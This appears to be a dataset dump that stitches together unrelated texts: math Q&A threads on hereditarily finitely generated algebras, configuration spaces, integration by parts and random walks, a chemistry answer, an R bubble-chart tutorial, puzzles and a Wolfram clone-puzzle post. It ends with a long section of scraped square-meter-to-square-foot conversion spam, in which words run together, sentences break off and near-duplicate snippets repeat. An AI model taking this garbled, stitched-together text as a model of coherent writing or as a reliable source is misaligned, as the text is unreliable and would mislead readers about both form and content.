arxiv_id
stringlengths 0
16
| text
stringlengths 10
1.65M
|
|---|---|
# Algebras whose subalgebras are finitely generated
Let $k$ be a commutative ring. Is there a name for those commutative $k$-algebras with the property that every subalgebra is finitely generated? (Equivalently, the partial order of subalgebras is Noetherian.) Can we say something about their structure? Where can I read more about them? I am particularly interested in the cases $k=\mathbb{Z}$ and when $k$ is field.
Notice that if $k$ is a field then $k[x,y]$ does not have the property, but $k[x]$ does. One can also check directly that the subrings of $\mathbb{Z} \times \mathbb{Z}$ are finitely generated because they are given by $\mathbb{Z}[(n,0)] = \mathbb{Z} \times_{\mathbb{Z}/n} \mathbb{Z}$, where $n \geq 0$. I wonder if there is a more conceptual reason for this.
(Usually an object is called Noetherian if its partial order of subobjects is Noetherian, and this applies for example to (non-abelian) groups and modules. But a ring is usually called Noetherian if its partial order of quotients is Noetherian. This is somewhat confusing. Therefore, although it would be consistent to call a ring Noetherian if its partial order of subrings is Noetherian, this would contradict the usual terminology.)
Edit. If $k$ is a field, then a necessary condition is that the algebra is finitely generated of Krull dimension $\leq 1$. This follows directly from Noether normalization and the fact, already mentioned above, that $k[x,y]$ does not have the property. But this condition is not sufficient, as the example $k[x,y]/(x^2)$ shows.
Summary of the answers so far. Keith Kearnes suggests the terms "supernoetherian" (if $k$ is Noetherian) and "hereditary finitely generated" (which sounds very good). YCor has reduced the general classification to the case of finitely generated $k$-domains (if $k$ is Noetherian). The classification in this case is still open. If $k$ is a field, is it equivalent to Krull dimension $\leq 1$? Is there a characterization if $k$ is not a field?
YCor has also generalized my observation on $\mathbb{Z} \times \mathbb{Z}$: The $k$-algebra $k \times k$ is hereditarily finitely generated if and only if $k$ is Noetherian, because in fact there is an isomorphism of partial orders between ideals of $k$ and subalgebras of $k \times k$ given by $I \mapsto k \cdot (1,1) + I \times \{0\}$.
• About terminology: the confusion, if any, is in the other direction: Noetherian was originally defined for finite generation of ideals in rings and then extended to other contexts.
– YCor
Oct 28, 2016 at 5:52
• For non-fields $k$, even for $k = \mathbb{Z}$, this seems to be a very restrictive property. For example, $\mathbb{Z}[X]$ does not have the property since the ring $\mathbb{Z}[2X,2X^2,2X^3,\ldots]$ is not finitely generated. I wonder (just a guess) if $\mathbb{Z}$-algebras with this property have to be subrings of a finite direct product of localizations of $\mathbb{Z}$ at finitely generated submonoids of the monoid of all positive integers under multiplication, or something like that. Oct 28, 2016 at 6:52
• It seems reasonable to conjecture that when $k$ is a field, these are exactly the finitely generated algebras of Krull dimension $\leq 1$. Oct 28, 2016 at 7:19
• @EricWofsey: I think that $k[x,y]/(x^2)$ is a counterexample to this claim. Oct 28, 2016 at 8:53
• @JesseElliott: It will not be that easy. For instance, finite commutative rings have the property. Oct 28, 2016 at 9:41
Let $k$ be a commutative ring. Is there a name for those commutative $k$-algebras with the property that every subalgebra is finitely generated? $\ldots$ Where can I read more about them?
The paper
Rogalski, D.; Sierra, S. J.; Stafford, J. T., Algebras in which every subalgebra is Noetherian. Proc. Amer. Math. Soc. 142 (2014), no. 9, 2983-2990.
introduces the term supernoetherian for a not-necessarily-commutative $k$-algebra $A$ that has the property that all subalgebras of $A$ are both (i) finitely generated and (ii) Noetherian. In the commutative case, when $k$ is Noetherian, (ii) follows from (i) by the Hilbert Basis Theorem, so these are exactly the $k$-algebras asked about here when $k$ is Noetherian. The authors of this paper consider only the case where $k$ is an algebraically closed field, and in this case they do observe that the commutative supernoetherian algebras have Krull dimension at most $1$, but they do not classify them.
• Thank you. This answers the terminology question. I would call this then "super finitely generated", since my question is not primarily about the property of being Noetherian. Notice that (i) -> (ii) needs that $k$ is Noetherian, but in their paper $k$ is just an alg. closed field. Oct 30, 2016 at 19:44
• I found a paper: Hereditarily Finitely Generated Commutative Monoids by J. C. Rosales and J. I. Garcı́a-Garcı́a, Journal of Algebra 221, 723-732 (1999). They use "hereditarily finitely generated" to mean a monoid whose submonoids are all finitely generated. This term might work for you. Oct 30, 2016 at 20:11
• Probably there's no need for new terminology. For instance, Philip Hall (Finiteness conditions for soluble groups, 1954) refers to "the maximal condition for right ideals" (in a ring), "the maximal condition for subgroups" "the maximal condition for normal subgroups", etc. "The maximal condition for subalgebras" can also be found in old papers, e.g. this one: archive.numdam.org/ARCHIVE/CM/CM_1975__31_1/CM_1975__31_1_31_0/…
– YCor
Oct 30, 2016 at 20:38
• @YCor: Thank you. But "ascending chain condition" (ACC) seems to be more standard and refers to arbitrary partial orders. Oct 30, 2016 at 20:45
• @KeithKearnes: This sounds good, especially because it is an adjective in contrast to ACC or maximal condition. Oct 30, 2016 at 20:46
I'll assume that $$k$$ is noetherian. I'll just write $$k$$-ACC, or ACC if no ambiguity, to mean the ascending chain condition on $$k$$-subalgebra.
(For $$k$$ arbitrary, $$A=k$$ is the only $$k$$-subalgebra of itself so satisfies the property, so can be arbitrarily bad.)
Here's an equivalence which then boils down to the case of a domain:
A $$k$$-algebra $$A$$ ($$k$$ is noetherian) has ACC iff the following 3 condition hold:
(i) $$A$$ is noetherian
(ii) the nilradical $$N_A$$ of $$A$$ is a finitely generated $$k$$-module
(iii) $$A/P$$ has ACC for every (minimal) prime ideal $$P$$ of $$A$$.
Indeed suppose that $$A$$ has ACC. (iii) immediately follows.
Let $$(I_n)$$ be an increasing sequence of ideals; so $$(I_n\cap k1_A)$$ is an ascending sequence of ideals of $$k1_A$$ and hence is stationary, say for $$n\ge n_0$$. Also $$(k1_A+I_n)$$ is an ascending sequence of $$k$$-subalgebras of $$A$$. So there exists $$n_1$$ (say $$\ge n_0$$) such that for every $$n\ge n_1$$ and $$x\in I_n$$, one can write $$x=x'+t1_A$$ with $$x'\in I_{n_1}$$ and $$t\in k$$. Then $$x'-x\in I_n\cap k1_A$$ and hence $$x'-x\in I_{n_0}$$. Thus $$x\in I_{n_1}$$; whence $$I_n=I_{n_1}$$ for all $$n\ge n_1$$. This proves (i).
To prove (ii), use that $$A$$ is noetherian to write a nested sequence of submodules $$0\le N_1\le \dots N_k=N_A$$ with each $$N_i$$ isomorphic as an $$A$$-module to $$A/P_i$$ for some prime $$i$$. Suppose by contradiction that some $$N_i$$ is an infinitely generated $$k$$-module. Since ACC passes to quotients, we can suppose that $$i=1$$. Since $$P_i$$ annihilates $$N_1$$ and contains the nilradical, we see that $$xy=0$$ for all $$x,y\in N_1$$. Therefore, for every $$k$$-submodule $$V$$ of $$N_1$$, the $$k$$-subalgebra generated by $$V$$ is reduced to $$k1_A+V$$. So if $$(V_n)$$ is an increasing sequence of submodules, from ACC we deduce that for large $$n$$, $$k1_A+V_n=k1_A+V_{n+1}$$ (in other words, the canonical map $$V_n/(k1_A\cap V_n)\to V_{n+1}/(k1_A\cap V_{n+1})$$ is an isomorphism). Since $$k$$ is noetherian, $$(k1_A\cap V_n)$$, as an ascending sequence of $$k$$-submodule of $$k1_A$$, is also stationary, say with union $$W$$. Hence the above canonical map is the inclusion $$V_n/W\to V_{n+1}/W$$; since it is an isomorphism it means that $$V_{n+1}=V_n$$.
Conversely suppose that (i),(ii),(iii) hold. It is easy to check (see below) that a finite direct product of $$k$$-algebras with ACC has ACC. By (i), $$A$$ has finitely many minimal primes $$P_i$$, so $$A/N_A$$ embeds as subalgebra in the finite product $$\prod A/P_i$$, which has ACC using (iii), hence $$A/N_A$$ has ACC. Also it is immediate that if an algebra $$A$$ has an ideal $$I$$ that is a f.g. $$k$$-module and $$A/I$$ has ACC then $$A$$ has ACC. Then using (ii) $$A$$ has ACC.
Fact: ($$k$$ noetherian) the $$k$$-ACC condition passes to finite direct products.
Proof: it's enough to do it for a product $$A\times B$$. Let $$(H_n)$$ be an ascending sequence of subalgebras of $$A\times B$$. The projections being stationary, we can suppose that the projections of $$H_n$$ on both $$A$$ and $$B$$ are surjective. It follows that the intersection $$H_n\cap (A\times\{0\})$$ is an ideal in $$A$$. Since $$A$$ is noetherian (as I first checked: this didn't use this finite product claim), this intersection is stationary and we're done.
• Thank you. Why is ACC preserved by finite products? This seems to be a nontrivial statement. A subalgebra of a product is not determined by its projections. Oct 30, 2016 at 20:49
• You have to play with both intersections and projections. If $H_1\subset H_2\subset A\times B$ and $H_1$ and $H_2$ have the same projections and intersections then $H_1=H_2$.
– YCor
Oct 30, 2016 at 20:55
• What do you mean by intersection? $A$ is not a subalgebra of $A \times B$. Oct 30, 2016 at 20:55
• Here is a comment about the Noetherian assumption on $k$: A commutative ring $k$ is Noetherian iff the $k$-algebra $k\times k$ is hereditarily finitely generated. Oct 30, 2016 at 22:03
• @KeithKearnes thanks for the remark (there's indeed a canonical poset isomorphism between the poset of ideals in $k$ and the poset of subalgebras of $k\times k$)
– YCor
Oct 30, 2016 at 22:20
|
|
# cohomology ring of the fundamental group of unordered configuration space
From the lecture notes INTRODUCTION TO CONFIGURATION SPACES AND THEIR APPLICATIONS, p. 18, I find:
Os it possible to derive the cohomology ring $H^*(Conf(S,k)/\Sigma_k;\mathbb{Z}_2)$ from the above theorem?
Question 1: Given a surface $S$, are there any methods to compute the fundamental group of $k$-th unordered configuration space $$\pi_1(Conf(S,k)/\Sigma_k)?$$
Question 2: Given a group $G=\pi_1(Conf(S,k)/\Sigma_k)$, I find $K(G,1)=BG.$ Are there any methods to compute the cohomology ring (cup product structure) $$H^*(BG;\mathbb{Z}_2)?$$
• Question 1 Yes, at least up to extension problem. The proof of the fact that $Conf(S-Q_k,k)$ is $K(\pi ,1)$ provides an explicit decomposition of $Conf(S-Q_k,k)$ into a fibration of $K(\pi ',1)$'s.
• Question 2 Yes, at least in theory. One can use the isomorphism $$H^*(BG,k)\cong Ext ^*_{k[G]}(k,k)$$ and the product structure of $Ext$ groups. However, in practice this method is not very convenient, you would be better off to look for some ad-hoc method.
|
|
Waiting for answer This question has not been answered yet. You can hire a professional tutor to get the answer.
QUESTION
# What are the cations and anions for the formula calcium iodide?
Calcium Iodide (CaI_2) separates to form one Calcium 2+ ion, Ca^(2+), and two iodine ions with a -1 charge, 2 I^-. The calcium ion is a cation because it carries a positive charge. The two iodine ions are anions because they carry a negative charge.
help predict which atoms will donate electrons and which will atoms receive electrons in a bond. Calcium has an oxidation number of +2. It can donate two electrons to an atom. Iodine in this situation has an oxidation state of -1. Each iodine will receive an electron from the calcium.
When calcium and 2 iodine atoms form a compound, calcium donates one electron to each iodine, giving calcium the +2 status and each iodine the -1 status.
|
|
[This article was first published on There's something about R, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)
Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.
Bubble charts are a great way to represent the data when you have instances that vary greatly, eg. the size of Canada compared to the size of Austria. However this type of a chart introduces a new dimension in the interpretation of data because the data is interpreted by the bubble size (area), and not linearly. The mistake when building such charts is that we ignore what is known as the illusion of linearity. This illusion (see this Article for more) is the effect that people tend to judge proportions linearly even when they are not linear. For example, the common mistake is that the pizza with the diameter of 20 cm is two times larger than the pizza with the diameter of 10 cm, while in fact the first pizza is 4 times larger than the second one because we judge the size of an area and not the diameter. The first pizza has the area of 314 cm² (r²Π) and the second one has 78,5 cm² → 314/78,5=4. Now back to bubble charts…
For this example I have loaded ggplot2 and created a simple dataset with three variables – x, y and size.
library(ggplot2)
dat=data.frame(c(1,2,3),c(2,3,1),c(10,20,30))
colnames(dat)<-c("x","y","size")
dat
The resulting dataset provides the coordinates and the bubble sizes for the chart. Now lets create the chart with annotated bubble sizes.
q<-ggplot(dat,aes())
q<-q + geom_point(aes(x=x,y=y), size=dat$size) #create bubbles q<-q + xlim(-1,5)+ylim(-1,5) #add limits to axes q<-q+ annotate("text",x=dat$x,y=dat$y,label=dat$size, color="white",size=6) #add size annotations
q<-q + theme_void() + theme(panel.background = element_rect(fill="lightblue")) #create a simple theme
q
The chart looks like this:
The basic issue is that the smallest bubble looks as it is 9 times smaller than the largest bubble instead of 3 times smaller because the size parameter of geom_point is determined by the diameter and not by area size.
To correct for this and to make the chart interpretable we will use the simple transformation of the size parameter in geom_point by square root.
q<-ggplot(dat,aes())
q<-q + geom_point(aes(x=x,y=y), size=sqrt(dat$size)*10) #create bubbles with a correct scale q<-q + xlim(-1,5)+ylim(-1,5) #add limits to axes q<-q+ annotate("text",x=dat$x,y=dat$y,label=dat$size, color="white",size=6) #add size annotations
q<-q + theme_void() + theme(panel.background = element_rect(fill="lightblue")) #create a simple theme
q
The multiplication of squared size by the factor of 10 is just for creating the bubbles large enough compared to the limits of axes.
The chart now looks like this:
The areas are now in the correct scale and the bubbles are proportional to the size variable.
Of course, if we would like to make three dimensional shapes, the correction factor would be third root, because when the diameter is increased by the factor of n, the volume is increased by the factor of n³.
Happy charting
This post was motivated by a lot of wonderful blogs on http://www.R-bloggers.com
|
|
# I can't hear you, hexadecimally!
Number Theory Level 2
Dr. Hex is a Physics and Differential Geometry professor at Princeton. On a typical day, he asks one of his students to remember a number, which he couldn't. He scolded him, saying "You are $$\text{DEAF}$$ to the sixteenth base!". What number did he ask him to remember?
×
Problem Loading...
Note Loading...
Set Loading...
|
|
How do you evaluate log_5 5?
${\log}_{5} 5 = 1$
When we write ${\log}_{x} y = z$, we ask to what power we raise the base $x$ to get $y$; here if ${\log}_{x} y = z$, then ${x}^{z} = y$. I can use any base, but typically scientists assume natural logarithms, ${\log}_{e}$, if the base is not specified, or, more rarely, ${\log}_{10}$.
Given this, can you tell me ${\log}_{10} 100$, ${\log}_{10} 1000$, and ${\log}_{10} 0.01$? These are all simple whole numbers.
|
|
# Thread: Evaluate the definite integral...integrating by parts
1. ## Evaluate the definite integral...integrating by parts
So, I have got another problem and can't figure out where is my mistake,
I have the following integral $\int_{2}^{5} t^{4}ln(2t)dt$, I considered $u = ln(2t) => u' = \frac{1}{2t}; v' = t^{4} => v = \frac{t^{5}}{5}$
and proceeded as follows: $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{2t}\frac{t^{5}}{5}dt =$ here, I considered that I can do some simplifications and
obtained that $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{10} t^{4}dt = \left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{5}}{50} =$,
but by evaluating it further and doing all the math I don't get the correct answer,
I saw that and thought that I can't do the simplifications since they are still $u'$ and $v$,
so, I considered them separately, even though it seems wrong for me $\left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{6} ln|2t|}{30}$ , but this also, as I expected, wrong,
please, can someone show me the mistake(s)?
2. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by dokrbb
So, I have got another problem and can't figure out where is my mistake,
I have the following integral $\int_{2}^{5} t^{4}ln(2t)dt$, I considered $u = ln(2t) => u' = \frac{1}{2t}; v' = t^{4} => v = \frac{t^{5}}{5}$
and proceeded as follows: $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{2t}\frac{t^{5}}{5}dt =$ here, I considered that I can do some simplifications and
obtained that $\left( \frac{t^{5}}{5}ln(2t) \right) - \int\frac{1}{10} t^{4}dt = \left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{5}}{50} =$,
but by evaluating it further and doing all the math I don't get the correct answer,
I saw that and thought that I can't do the simplifications since they are still $u'$ and $v$,
so, I considered them separately, even though it seems wrong for me $\left( \frac{t^{5}}{5}ln(2t) \right) - \frac{t^{6} ln|2t|}{30}$ , but this also, as I expected, wrong,
please, can someone show me the mistake(s)?
did you apply the limits 2 and 5 correctly? also, the derivative u' is 1/t, not 1/2t
3. ## Re: Evaluate the definite integral...integrating by parts
Originally Posted by votan
did you apply the limits 2 and 5 correctly?
with my first evaluation I get 1368,383397, with the second one I have 233,9377581 (but I suppose this one is a priori wrong, so...),
4. ## Re: Evaluate the definite integral...integrating by parts
[QUOTE=dokrbb;799460]I considered $u = ln(2t) => u' = \frac{1}{2t}$
Consider it further
Edit: sorry, votan did say that!
5. ## Re: Evaluate the definite integral...integrating by parts
[QUOTE=tom@ballooncalculus;799489]
Originally Posted by dokrbb
I considered $u = ln(2t) => u' = \frac{1}{2t}$
Consider it further
Edit: sorry, votan did say that!
and if you were answering without sarcasm...
6. ## Re: Evaluate the definite integral...integrating by parts
never mind, I figured it out,
|
|
# Random walks in $1$, $2$ and $3$ dimensions [closed]
I know that this may seem easy but I have no clue where to start (if possible could you answer this in the simplest way possible)?
Consider a person who is at the position $x=0$ on the $x$-axis at time $0$. At time $t=1$ he moves to $x = 1$ or $x = −1$ with probability $1/2$. After $t$ seconds if he is in position $x$, he will move to $x + 1$ or $x − 1$ with probability $1/2$. Discuss the following questions:
1. What is the probability that he will be back at position $0$?
2. Given a fixed point $X$, what is the probability that he reaches $X$, if we do not mind how long it takes?
3. Discuss the same problem in two and three dimensional space. In $2$D, he moves north, south, west or east, each one with the probability $1/4$. In $3$D there are $6$ directions he might take, each one with probability $1/6$.
-
## closed as not a real question by Asaf Karagila, azimut, Paul, Jim, user1729Apr 10 '13 at 8:46
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center.If this question can be reworded to fit the rules in the help center, please edit the question.
Nice question, doesn't seem that basic to me for higher dimensions. For 1 dimensions the answer is it will return with probability $1$. – muzzlator Apr 9 '13 at 20:39
can you explain why? – MIMI Apr 9 '13 at 21:06
Start here: math.stackexchange.com/questions/536/… – Byron Schmuland Apr 9 '13 at 21:35
– Byron Schmuland Apr 9 '13 at 21:38
|
|
# Clone Puzzle: Pebbling the Chessboard
Posted 8 months ago
842 Views
|
|
7 Total Likes
|
The clone puzzle was recently popularized by a great YouTube presentation by Zvezdelina Stankova on the Numberphile channel (https://www.youtube.com/watch?v=lFQGSGsXbXE). It serves as a good examples of some key concepts in Mathematics:
• Invariants
• Limits (geometric series)
The game starts with three checkers in the lower-left corner of a quarter-infinite chessboard. A move replaces one checker with one each above and to the right of the original. The goal is to get all checkers out of the highlighted jail.
You can try to solve the challenge from any of the proposed initial positions, using the CDF version attached, or the source notebook of this post.
The invariant is constructed by assigning the value 1 to the lower-left square, then each square receives half the value of the square below or to the left. A move will not change the sum of all occupied squares. The total value of the highlighted jail is 2, and the value of the infinite rest of the board is also 2. To win, you would have to fill all squares in the infinite board.
## Programming the Clone Puzzle
Each square of the board is a Button[] with the rendering depending dynamically on the board (which is an array of True/False values).
The board will automatically extend when you approach the top or right edges.
I've used a classless object-oriented approach, that attaches all code to a single unique symbol, with object data stored in additional symbols, all created in a Module[]. The constructor has this outline:
makeBoard[size_,initial_List]:=Module[{clone,board, ...},
board=...;(*array of True/False values *)
aux[]:=...;
clone[undo]:=...;
clone[game]:=...;
clone]
Methods are of the form clone[meth]. The game is set up as a DynamicModule[] with a menu for the initial positions and undo/reset buttons:
ClonePuzzle[]:=With[{pops=Function[{pos,jail},makeBoard[10,pos,jail]->makeBoard[4,pos,jail][image]]@@@sampleLayouts},
Clear[board];
DynamicModule[{board=pops[[1,1]]},
Column[{
SetterBar[Dynamic[board],pops],
Row[{Button["undo",board[undo],Enabled->Dynamic[board[dirty]]],
Button["reset",board[reset],Enabled->Dynamic[board[dirty]]] },ImageSize->Full],
Dynamic[board[game]]
}],SaveDefinitions->True]]
The board rendering creates a table of buttons (in the render[] auxiliary function). The board itself depends only on hits size (dim), which avoids unnecessary dynamic updates.
clone[game]:=
Deploy[Framed[Dynamic[GraphicsGrid[
Table[Item[render[i,j],Background->bg[i,j]],{i,dim,1,-1},{j,dim}], Frame->True,ImageSize->Large],
TrackedSymbols:>{dim}]]
];
Attachments:
|
|
# Convert to square meter to square feet
Square Feet to Square Meters (ft2 to m2) Conversion
How many squaremeters in a squarefoot? Squarefeettosquaremeters area units conversion factor is 0.09290304.
Square Meters to Square Feet - m² to ft² conversion
SquareFeettoSquareMeters (Swap Units). Format. Decimal Fractions. Accuracy. Select resolution 1 significant figure 2 significant figures 3 significant figures 4 significant figures 5 significant figures 6 significant figures 7 significant figures 8 significant figures. Note: Fractional results are rounded to the.
Square Meters to Square Feet Conversion
This calculator provides conversion of squaremeterstosquarefeet and backwards (sq ft to sq m).
Square Foot to Square Meter Conversion - Convert Square Foot to...
You are currently converting Area units from SquareFoottoSquareMeter.
Convert Square Feet to Square Meters - Area
Converting a squarefoot area measurement to a squaremeter measurement involves multiplying your area by the conversion ratio to find the result. A squarefoot is equal to 0.092903 squaremeters, so to convert simply multiply by 0.092903.
Square Meter to Square Foot Conversion (m² to ft²)
A squarefoot (pl. squarefeet) is one of the most commonly used non-metric and non-SI unit of area.
Convert square meter to square feet
The squaremeter [m^2] tosquarefoot [ft^2] conversion table and conversion steps are also listed. Also, explore tools to convertsquaremeter or
Convert square meter to square foot - Conversion of Measurement...
Quickly convertsquaremeters into squarefeet (squaremetertosquarefoot) using the online calculator for metricconversions and more.
How to Convert Square Meters to Square Feet and Vice Versa
Two Parts:Converting Between SquareMeters and SquareFeetConverting Based on Length Measurements Community Q&A. Almost every country in the world uses the metric system of measurement, including squaremetersto measure area. The United States is a big exception.
Square feet To Square meters Conversion
Use the online squarefoottosquaremeter calculator, the conversion tables, diagrams or charts.
Square Feet to Square Meters Converter
So, 1 squarefeet times 0.09290304 is equal to 0.09290304 squaremeters. See details below and use our calculator to convert any value in square
Square Feet to Square Meters - Kyle's Converter
Instantly ConvertSquareFeet (sq ft) toSquareMeters (m 2 ) and Many More Area Conversions Online.
Square Meters to Square Feet Converter - Unit Converter
Both squaremeters and squarefeet are units of measurement for area. You can convertsquaremeterstosquarefeet multiplying by 10.7639. Check other area converters.
Convert 300 square meters to square feet
Convertingsquarefeettosquaremeters The squarefoot is the smaller unit of area, so you will have to divide a measurement in squarefeet by the number of squarefeet per squaremeter.
Square meters to square feet (m² to ft²) Metric conversion calculator
Welcome to our squaremeterstosquarefeet (m² to ft²) conversion calculator. You can enter a value in either the squaremeters or squarefeet input fields. For an understanding of the conversion process, we include step by step and direct conversion formulas.
Convert square feet to square meters - Area Conversions
Online calculator to convertsquarefeettosquaremeters (ft2 to m2) with formulas, examples, and tables. Our conversions provide a quick and easy way to convert between Area units.
Convert Square Meter (m²) to Square Feet (ft²) - Unit Conversion...
SquareMeterSquare Millimeter Square Centimeter Square Decimeter Square Dekameter Square Hectometer Square Kilometer Square Inch SquareFeetSquare Yard Square Mile Acre Are Hectares Section
Convert Square Feet To Square Meters (m² = ft² ?)
To convert cost per squarefeet(cost/ft²) to cost per squaremeters(cost/m²) , fill in the blank of cost/ft². Total cost is a rounding number for reference.
Convert square meters to square feet - surface area conversion
Exchange reading in squaremeters unit m2 , sq m into squarefeet unit ft2 , sq ft as in an equivalent measurement result (two different units but the same identical physical total value, which is also equal to their proportional parts when divided or multiplied). One squaremeterconverted into squarefoot.
Convert square meter to square foot - area converter
Convert area units. Easily convertsquaremetertosquarefoot, convert m 2 to sq ft Many other converters available for free.
Square meters to square feet
Enter the value in squaremeters in the top field (the one marked "m²"), then press the "Convert" button or the "Enter" key. The converter also works the other way round: if you enter the value in squarefeet in the "ft²" field, the equivalent value in squaremeters is calculated and displayed in the.
Square feet to Square meters Conversion Tool
10 square yard tosquaremeters, the result is 8.3612736 squaremeters.
How Do You Convert Square Feet to Square Meters? - Reference.com
Hence, one squarefoot equals approximately 0.093 squaremeters. A house that has 2,500 squarefeet is 232.5 squaremeters in size. The foot is a unit of length in the system of measurement used in the United States. One foot contains 12 inches, which equals 0.3048 meters.
Convert 4200 square feet to square meters. How many square...
4200 squarefeet. What size is it? How many in square miles, feet, inches, yards, meters? Convert between metric and imperial units.
Convert square meter to square feet - Conversion tables and...
squaremeterconversions Definition squaremetertosquarefeetconversion table Conversion calculator.
What's the formula to convert square feet into square meters?
So to convert from squarefeettosquaremeters, just multiply by 0.0929. So let's say you're in the United States, and you've purchased a home that's 2,030 squarefeet. You're trying to tell your friend in London about the home, and how big it is. 2030 x 0.0929 = 188.587.
How to convert square feet to square meters - Quora
To convert from squaremeterstosquarefeet, you just need to multiply the value in squaremeters by 10.76391041671 (the conversion factor).
Square feet to square meters [ft² to m²] area conversion
Convertsquarefoottosquaremeter [ft² to m²] and back. Area: A[m²]=0.09290304×A[ft²]. A[ft²]=10.7639104×A[m²].
Square Feet to Square Meters Calculator - Convert sq ft to sq m
Wondering how to convertsquarefeettosquaremeters? Take the work out of calculating the conversion and simple enter in the number of
For Environment: How to Convert Square Meters to Square Feet
One squarefoot is approximately 0.093 squaremeters. One squaremeter is approximately 10.76 squarefeet.
Convert Square meter to Square foot
1 Squaremeter [m²] = 10.76391041671 Squarefoot [ft²] --- Measurement calculator that can be used to convertSquaremetertoSquarefoot, among others.
How to Convert Square Feet Into Square Meters - Sciencing
You can convertsquarefeettosquaremeters with simple multiplication or division; however, first make sure you're actually dealing with squarefeet -- not linear feet.
convert square meters to square feet - Forum
I see that Excel has a "CONVERT" function which allows you to covert feet to meters etc. Is there a function that will allow you to convert the area covered from one metricto another?
Convert square feet to square meter
Convertsquares. How many squaremeter is 1 squarefeet? 1 squarefeet = 0.0929 squaremeter ( swap squarefeet and squaremeter ).
Square Meters to Square Feet (sq m to sq ft) Conversion
Enter squaremeters or squarefeet for conversion: Select conversion type
Square Meter to Square Feet Calculator - [email protected]
SquareMetertoSquareFoot Calculator is used to convertsquaremeter into squarefeet.
Square Meters To Square Feet - Square Meters To Square Feet...
This site is a dedicated SquareMetersToSquareFeet and SquareFeetToSquareMeters calculator that you can access from any browser including your mobile phone.
Square Feet - Square Meter Conversion
The radio button is used to separate squarefeettosquaremeterconverter and squaremetertosquarefeetconverter each other. Before make any conversion make sure whether you have selected an appropriate radio button and do further steps.
Convert square feet to square meters - free online unit converter
SquareMeter - A basic metric unit of area equal to one meter length by one meter width. Type your input value (in squarefeet) in the left text field, to get the result in squaremeters in the second text field.
How many square meters in a square feet? - Square Feet to Square...
SquareFeettoSquareMetersConversion. Enter a value that you want to convert into sq. meters and click on the "convert" button.
Convert Square meter to Square Feet
similarly when we convert this squaremeter into squarefeet then it becomes feetsquare which is denoted by ft 2.
Convert Square Feet to Acres - Square ft - Acres Converter
Area and squarefeet are units for area that are most commonly used to measure large areas of land, football fields or houses although the acre is one of
Square Footage Calculator - Omni - How to convert sqm to sqft?
Squarefootage calculator is an easy tool that enables its users to calculate an area in squarefeet. In this article, we are going to explain how to use this tool and how
Square Meters to Square Foots Conversion Calculator
Bookmark squaremetertosquarefootConversion Calculator - you will probably need it in the future. Download Area Unit Converter our powerful software utility that helps you make easy conversion between more than 2,100 various units of measure in more than 70 categories.
Convert m2, sq m to sq ft , ft2 - square meter to square feet
Diferent area surface units conversion from squaremetertosquarefeet.
square meter to square feet conversion
Conversion between squaremeter, square mile, square yard, square inch, squarefeet, square centimeter, hectare, acre.
Convert square meters to square feet
squaremeters definition. The SquareMeter is the main metric unit of area enclosed by a square with sides of one meter each. A SquareMeter is equal to 10,000 square
Square meters to Square feet (m² to sq ft) converter - All The Units
Units swap: ConvertSquarefeettoSquaremeters. Excel formula to convert m² to sq ft.
Square Footage Calculator - Convert all of your measurements to feet
Convert among square inch, squarefoot, square yard and squaremeter. You could, for example, perform all of your measurements in inches or centimeters, calculate area in square inches or square centimeters
Square Feet to Square Meters (ft2, sq ft to m2, sq m) conversion...
Category: area Conversion: SquareFeettoSquareMeters The base unit for area is squaremeters (Non-SI/Derived Unit) [SquareFeet] symbol/abbrevation
Area Conversion: square meter square feet hectare acre square mile
It converts following common area units: square centimeter (cm2), squaremeter (m2), hectare (ha), square kilometer (km2), square inch (in2), squarefeet/foot (ft2), square yard (yd2), square mile (mi2), acre (ac). Along with the common area units.
View question - convert 490 square feet to square metres
Solve advanced problems in Physics, Mathematics and Engineering. Math Expression Renderer, Plots, Unit Converter, Equation Solver, Complex Numbers, Calculation History.
How to Convert Cost Per Square Foot to Cost Per Square Meter
Convert back from squaremeter cost tosquarefoot cost by multiplying the squaremeter cost by 0.0929. For a squaremeter price of $14.60, that rounds out to$1.36 per squarefoot.
Convert Square Meters to Square Feet.
The second method of the convertingmeters into feet in squaremeterstosquarefeet. First thing before calculating you have to understand the actual
Conversion square foot (ft2) to square metre (m2)
Converter of squarefoottosquaremetre, formula and table of conversion of ft2 in m2.
How to Convert a Board Foot to a Square Meter - Hunker
A board foot is a standard measurement of lumber that indicates the length, width and thickness of a board that equals a total of one squarefoot.
Square meter to square feet Calculator - Convert Area m2 to ft2 Online
How many Squaremeter make 1 squarefeet ? How can I convert m2 to ft2? To find out the answer to any of these questions, simply select the appropriate unit from each 'select' box above, enter your figure (x) into the 'value to convert' box and click the 'Convert!' button. Whilst every effort has been made in.
How to Convert Cost Per Square Foot to Cost Per Square Meter
Convert back from squaremeter cost tosquarefoot cost by multiplying the squaremeter cost by 0.0929. For a squaremeter price of £9.40, that rounds out to 80p per squarefoot.
Measurement - Convert Square Foot to Square Metre (Si Unit) - Area
Conversion of units between SquareFoot and SquareMetre (Si Unit) (sq ft and m2) is the conversion between different units of measurement, in this case it's Square
Square Feet to Square Meters Conversion table
Conversion Tables. Calculator. SquareFeettoSquareMetersConversion table.
regression - Converting a Model from square feet to square meter...
For squarefeettosquaremeters, this would be $x = 10.7639 \cdot x'$ -- Be careful about the direction of change. What we want to do is take the desired quantity (the area in squaremeters) and convert it to the quantity we have the model for (the area in squarefeet).
How Is The Square Feet (sft) Of Plots/lands Converted To Square...
To get squaremeters or squarefeet, just multiply the length by the width. To convertmetrestofeet or feet to metres: http
Square Feet vs Square Meters - Calc Monster
Squarefeet or squaremeters? Which measuring unit should I use? There situations when you need to calculate the squarefootage vs calculate squaremeter.
Square feet to square meters sites of the web
MetricConversion charts and calculators,This online unit conversion tool will help you convert measurement units anytime and solve homework problems quickly using metricconversion tables, SI units, and more.
Convert area: 157 ft2 (square foot) to ..
